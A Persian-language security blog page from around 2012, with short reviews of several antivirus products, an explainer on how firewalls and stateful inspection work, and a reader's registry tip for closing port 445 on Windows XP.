7- آنتی ویروس پاندا; با وجود اینکه این آنتی ویروس یکی از شکست خوردگان در قدیم است اما امسال یکی از بهترین آنتی ویروس ها خود را ارائه کرده است . این آنتی ویروس یکی از بزرگترین آنتی ویروس های قدیم بود و از بهترین ویژگی ها آن میتوان به تعادل رابطه ی تعاملی کاربری ، امنیت آن و پایگاه های داده ی آن اشاره کرد . البته فکر نمیکنم تعداد بسیاری از این آنتی ویروس استفاده کنند اما باید توجه کرد که این آنتی ویروس یک آنتی ویروس بسیار عالی برای آنانی است که از کامپیوتر های بسیار قدیمی و کم قدرت استفاده میکنند.



8-آنتی ویروس AVG; به جرأت میتوانم بگویم که این آنتی ویروس در صدر آنتی ویروس های رایگان است همچنین این آنتی ویروس شما را از بسیاری از ویروس ها و برنامه ی مخرب مصون میدارد . فن آوری استفاده شده در آن موسوم به فن آوری سپر شماره مانع از باز کردن فایل های آلوده مینماید . پس از تست کردن این آنتی ویروس به نظر می آید با توجه به قدیمی بودن آن هنوز هم حرف های بسیاری برای گفتن دارد !



9-آنتی ویروس AVAST; نسخه ی رایگان این آنتی ویروس یکی از بهترین آنتی ویروس های رایگان است . نسخه ی رایگان آن میتواند با دیگر آنتی ویروس ها از نظر امنیت و دیتابیس مقابله کند . اما عمده مشکل آن قیمت های بروزرسانی آن است . ولی من پس مقایسه ی ویژگی ها نسخه رایگان با نسخه پولی واقعا تحت تاثیر قرار گرفتم .





10 – آنتی ویروس CA; در اصل نام این آنتی ویروس همکار رایانه (Computer Associates Antivirus 2012) که بصورت خلاصه به CA معروف است . اما ویژگی های این همکار رایانه آن را برابر با بسیاری از آنتی ویروس ها می سازد . این همکار رایانه کامپیوتر شما را از هرگونه فایل های اضافی، ویروس ها پاک می سازد . پس این برنامه برای در کنار بودم یک آنتی ویروس لازم است.

 

مرتضی(Germany) بازدید : 126 شنبه 16 اردیبهشت 1391 نظرات (0)

یک فایروال چه می کند؟ یک فایروال در حقیقت حصاری است که نیروهای خرابکار را از شما دور نگه می دارد. به همین دلیل به آن فایروال (دیوار آتش) گفته می شود. کار این حصار شبیه یک دیوار آتش فیزیکی است که از گسترش آتش از یک ناحیه به ناحیه دیگر جلوگیری می کند.

در این گزارش که از مقاله ی منتشر شده توسط مرکز مدیریت امداد و هماهنگی عملیات رخدادهای رایانه یی(ماهر) برگرفته شده، اطلاعات بیش تری راجع به فایروال ها، نحوه کار آن ها و خطراتی که در مقابل آن از شما محافظت می کنند، به دست خواهید آورد.



● یک فایروال چه می کند؟

یک فایروال یک برنامه یا یک وسیله سخت افزاری است که اطلاعاتی را که از طریق اینترنت به شبکه یا کامپیوتر شما وارد و یا از آن خارج می شود، بررسی و درصورت نیاز فیلتر می کند. اگر بسته ای که در حال ورود به شبکه شماست بعنوان بسته فیلتری برچسب بخورد، دیگر اجازه ورود به شبکه شما را نخواهد داشت.

فایروال می تواند قوانین امنیتی را پیاده کند. برای مثال یکی از قوانین امنیتی یک شرکت می تواند این باشد: از میان ۵۰۰ کامپیوتر این شرکت، فقط یکی حق دارد ترافیک FTP را دریافت کند. یک شرکت می تواند چنین قوانینی را برای سرورهای FTP، سرورهای وب، سرورهای Telnet و مانند آن اختصاص داده و تعریف کند.

به علاوه یک شرکت می تواند در مورد نحوه اتصال کارمندان به وب سایت ها و اینکه آیا فایل ها مجوز خروج از شبکه شرکت را دارند یا خیر، کنترل های لازم را اعمال کند. یک فایروال کنترل مناسبی برروی نحوه استفاده کارمندان از شبکه ایجاد می کند.

فایروال ها با استفاده از چند روش ترافیک ورودی و خروجی شبکه را کنترل می کنند.


تفتیش Stateful

روشی جدید که محتویات هر بسته را بررسی نمی کند و به جای آن، بخش های کلیدی مشخصی از بسته ها را با یک پایگاه داده مطمئن مقایسه می کند. اطلاعاتی که از درون فایروال به بیرون می روند، از لحاظ برخی ویژگی ها بررسی و کنترل شده و اطلاعات ورودی با این ویژگی ها مقایسه می گردند. اگر تطابق معنا داری بین این دو دسته وجود داشته باشد، آنگاه اطلاعات اجازه ورود را خواهند داشت و در غیر این صورت رد می شوند.

 

مرتضی(Germany) بازدید : 831 شنبه 16 اردیبهشت 1391 نظرات (0)

 

بستن پورت 445 که 100% جواب میده

 

سلام
این اولین پسته منه
در انجمن انواع راه حل های بستن پورت خطرناک 445 را اموزش داده ولی من هرکدوم را اجرا کردم جواب نداد
این روش را توی نت پیداکردم امیدوارم بدردتون بخوره
من این روش را توی xp اجراکردم جواب داد
توی run بزنید regedit
بعد این مسیر را برید
HKEY_LOCAL_MACHINESystemCurrentControlSetServic esNetBTParameters

بعد سمت راست این کلید TransportBindName را انتخاب روش دوبار کلیک کنید

یک پنجره باز میشه مقادیر value data را پاک کنید و ok را بزنید
حالا سیستم را رستات کنید
حالا این دستور netstat -an را توی داس یا همون cmd بزنید میبینید خبری از پورت445 نیست



درباره ما
سایتی دیگر از تیم بزرگ بکس 021 برای انتقال تجربیات ارزشمندشان دز زمینه های بالا بردن امنیت سیستم های یوزرهای بازدیدکننده عزیز
اطلاعات کاربری
  • فراموشی رمز عبور؟
  • آرشیو
    نظرسنجی
    نظرتان در مورد هک ایران چیست
    آمار سایت
  • کل مطالب : 65
  • کل نظرات : 10
  • افراد آنلاین : 2
  • تعداد اعضا : 52
  • آی پی امروز : 11
  • آی پی دیروز : 13
  • بازدید امروز : 13
  • باردید دیروز : 15
  • گوگل امروز : 0
  • گوگل دیروز : 0
  • بازدید هفته : 32
  • بازدید ماه : 29
  • بازدید سال : 742
  • بازدید کلی : 25,387